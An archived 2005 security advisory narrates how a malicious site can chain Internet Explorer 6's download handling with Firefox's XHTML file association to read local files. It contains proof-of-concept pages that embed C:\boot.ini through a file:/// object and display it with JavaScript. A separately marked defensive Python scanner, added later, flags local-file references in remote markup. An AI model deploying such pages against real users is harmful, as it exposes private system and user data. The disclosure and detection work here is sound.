ie6fire.txt

2005-06-01T00:00:00
ID PACKETSTORM:37797
Type packetstorm
Reporter bitlance winter
Modified 2005-06-01T00:00:00

Description

                                        
`Hello, all.  
  
IE6 kicks Firefox's BUG : Local Information Disclosure.  
  
MIME types (commonly used on the web) determine what kind of content  
is being sent down and give the browser an idea of how to parse, render  
or otherwise deal with the content.  
"application/zip", for example, is what's sent by the web server when  
your browser accesses a ZIP file.  
Directory-specific directive files such as .htaccess (as used by Apache,  
for example) can be used to associate a particular MIME type with a given  
file extension. For example, AddType application/xhtml+xml .xhtml will  
configure Apache to send .xhtml files with application/xhtml+xml.  
  
Internet Explorer's support of XHTML is incomplete. IE does not recognize  
the XHTML MIME type "application/xhtml+xml", which is required for true  
XHTML compliance. So instead of rendering the page, IE presents a file  
download prompt to the user.  
  
See also.  
http://www.w3.org/TR/xhtml-media-types/  
http://www.rfc-editor.org/rfc/rfc3236.txt  
http://www.w3.org/People/mimasa/test/xhtml/media-types/  
http://www.w3.org/People/mimasa/test/xhtml/media-types/results  
  
Many people who want to read XHTML files install Firefox, which supports  
XHTML files with the MIME type "application/xhtml+xml".  
  
=========  
STORY  
=========  
A man gets a new PC. The OS is Windows XP SP2. Of course, he does not forget  
Windows Update. Now his machine is fully patched.  
He installs Firefox and sets Firefox as his default browser.  
He wants to read XHTML files with "Content-Type: application/xhtml+xml".  
The next day, he opens Firefox's Options, General, and clears the "Firefox  
should check to see if it is the default browser when starting" check box.  
Then he runs Internet Explorer and sets IE as his default browser again.  
  
Now he opens the "My Documents" folder window and chooses 'Tools', then  
'Folder Options', then the 'File Types' tab. He selects the file type  
".xhtml" and checks it. He finds that Firefox is still associated with the  
file type. Yes, Internet Explorer cannot open XHTML files, he thinks. O.K.,  
when he wants to read HTML files, IE opens the pages, and when he wants to  
read XHTML files, Firefox opens the resources. COOL TIPS! he thinks.  
  
=========  
NOTE  
=========  
=== He is wrong. That is not COOL. ===  
  
=========  
STORY  
=========  
An attacker makes "bar.xhtml" (application/xhtml+xml) and "foo.html"  
(text/html). Below are samples.  
  
=== http://[malicious-site]/foo.html ===  
The server gives Content-Type: text/html  
========================================  
<html>  
<head>  
<title>link to bar.xhtml</title>  
<meta http-equiv="Refresh" content="1; URL=./bar.xhtml">  
</head>  
<body><a href="./bar.xhtml">Click Me.</a>  
</body>  
</html>  
========================================  
  
=== http://[malicious-site]/bar.xhtml ===  
The server gives Content-Type: application/xhtml+xml  
=========================================  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"  
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">  
<head>  
<title>IE - Firefox : Local Information Disclosure  
</title>  
<link rev="MADE" href="mailto:foo@example.com" />  
<link rel="CONTENTS" href="./" />  
<script type="text/javascript">  
<![CDATA[  
function Test(){  
alert(local_file.document.firstChild.innerHTML);  
}  
window.onload=Test;  
]]>  
</script>  
</head>  
<body>  
<h1>IE - Firefox : Local Information Disclosure</h1>  
<h2>  
boot.ini (Windows XP with Service Pack 2)  
</h2>  
<div>  
<object data="file:///c:/boot.ini" type="text/plain" width="780"  
height="130" name="local_file">  
<p>display local_file</p>  
</object>  
</div>  
<h2>  
%USERPROFILE% Folder , Internet Cache Folder Random PATH for IE  
</h2>  
<div>  
<script type="text/javascript">  
<![CDATA[  
var displocation=location.href;  
var divElement=document.createElement('DIV');  
divElement.setAttribute('style',  
'color:black; background-color:BlanchedAlmond;');  
document.body.appendChild(divElement);  
var text=document.createTextNode(displocation);  
divElement.appendChild(text);  
]]>  
</script>  
</div>  
</body>  
</html>  
=========================================  
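
A defender-side check for the pattern in bar.xhtml above: flag markup that arrived over HTTP but whose elements point at file: URLs (generalized here to UNC and drive-letter paths as well), for use at a proxy or when triaging files found in the browser cache. This is an added example, not part of the original advisory; the function names, the host name and the sample document are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a browser fetch or embed another resource.
URL_ATTRS = {"data", "src", "href", "action", "codebase"}
# file: URLs, UNC paths and drive-letter paths all point at the local machine.
_LOCAL = re.compile(r"^(file:|\\\\|[a-z]:[\\/])", re.IGNORECASE)

def is_local_url(value):
    return bool(_LOCAL.match(value.strip()))

class LocalRefScanner(HTMLParser):
    """Lenient parser, so it copes with both text/html and XHTML bodies."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]  # line on which the tag starts
        for name, value in attrs:
            if name in URL_ATTRS and value and is_local_url(value):
                self.findings.append((line, tag, name, value))

def scan(markup, served_from):
    """Return (line, tag, attribute, value) for local references in remote markup."""
    if urlsplit(served_from).scheme not in ("http", "https"):
        return []  # only content that arrived from the network is of interest
    scanner = LocalRefScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

# Constructed sample, cut down from the bar.xhtml listing above.
SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>t</title>
<link rel="CONTENTS" href="./" />
</head>
<body>
<object data="file:///c:/boot.ini" type="text/plain" name="local_file">
<p>display local_file</p>
</object>
<img src="images/logo.png" alt="" />
</body>
</html>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE, "http://malicious-site.example/bar.xhtml"):
        print("local reference at line %d: <%s %s=%r>" % finding)
```
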
  
=========  
NOTE  
=========  
  
See also.  
  
[Bugzilla]  
https://bugzilla.mozilla.org/show_bug.cgi?id=273419  
https://bugzilla.mozilla.org/show_bug.cgi?id=230606  
  
[Full-Disclosure ML]  
Disclosure of local file content in Mozilla Firefox and Opera  
http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/  
029833.html --- Giovanni Delvecchio  
029846.html --- Juergen Schmidt  
029856.html --- Thor Larholm  
(Thanks a lot.)  
  
=========  
STORY  
=========  
One day, he uses IE and visits the attacker's site.  
As soon as he accesses the URL http://[malicious-site]/foo.html,  
he sees the "File Download" dialog box pop up.  
  
===============================================  
File Download - Security Warning  
  
Do you want to run or save this file?  
  
Name: bar.xhtml  
Type: Unknown (file type), 1.23 KB  
From: [malicious-site]  
  
button: [Run] [Save] [Cancel]  
  
check box: Always ask before opening this type of file  
  
Blue Shield Icon :  
While files from the Internet can be useful, this file type can  
potentially harm your computer. If you do not trust the source, do not  
run or save this software. What's the risk?  
  
================================================  
  
=========  
NOTE  
=========  
Pay attention to the check box and the blue shield icon. It is not a yellow icon!!  
  
=========  
STORY  
=========  
He reads this dialog and thinks:  
- O.K. It is NOT a yellow icon. If the file is a bad one, the icon is yellow  
- or red. Why a blue icon? Because "bar.xhtml" is an XHTML file and  
- it is safe. Type is unknown? Because IE does not recognize  
- the xhtml MIME type. Good.  
- Hmmmmm. "Always ask before opening this type of file"?  
- An XHTML file is safe when Firefox opens it. I will clear the check  
- box. That is all. O.K. Now I will click the "Run" button.  
  
=========  
NOTE  
=========  
When you first choose to download a file in Internet Explorer, you  
receive a Confirm File Open dialog box. The "Always ask before opening  
this type of file" check box in this dialog box is selected.  
If you clear the "Always ask before opening this type of file" check  
box, the registry entry for this setting is changed and you do not see  
the Confirm File Open dialog box in subsequent download sessions.  
Instead, Internet Explorer automatically opens files instead of  
downloading them.  
  
By the way, see also.  
http://www.microsoft.com/technet/security/smallbusiness/prodtech/windowsxp/iesecxp.mspx  
[quoted]  
Heed any warnings. When a Web site attempts to download a file to your  
computer, Internet Explorer displays a message about saving, running,  
or installing the file. If the message contains a yellow caution icon,  
then the file has been identified as one that could pose a risk.  
[/quoted]  
What about the blue icon? Is it safe? ;-)  
In this story, 'HE' knows that a yellow or red icon is a dangerous one.  
At last he clicks the 'Run' button.  
  
=========  
STORY  
=========  
Firefox runs and displays http://[malicious-site]/bar.xhtml  
Files of this XHTML type are automatically placed  
=== in the Temporary Internet Files folder ====  
and opened by the program that is associated with the file type.  
  
Then his local machine information is disclosed via javascript.  
boot.ini  
%USERPROFILE%  
Internet Cache Folder Random PATH for IE  
and so on E.T.C.  
  
He is very surprised.  
His name is bitlance winter.... ;-<  
  
=========  
NOTE  
=========  
This is bad behavior on Internet Explorer's part.  
"Files of the type are automatically placed  
=== in the Temporary Internet Files folder ====  
and opened by the program that is associated with the file type."  
  
This is bad behavior on Internet Explorer's part, too.  
If he does not clear the "Always..." check box when he clicks the  
"Run" button, files of the type are placed  
=== in the Temporary Internet Files folder ====  
and opened by the program that is associated with the file type.  
  
Firefox ? uhhhmmmmmm .  
Opera is FIXED, perhaps.  
  
Tested on  
WindowsXP SP2  
  
Internet Explorer 6 SP2 full-patched (Japanese version)  
- Version 6.0.2900.2180.xpsp_sp2_gdr.050301-1519  
  
Firefox 1.0.3 (en-US)  
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7)  
- Gecko/20050414 Firefox/1.0.3  
  
Sorry too bad English.  
Thank you for your reading this true story.  
Best Regards.  
  
--  
bitlance winter  
  
  
`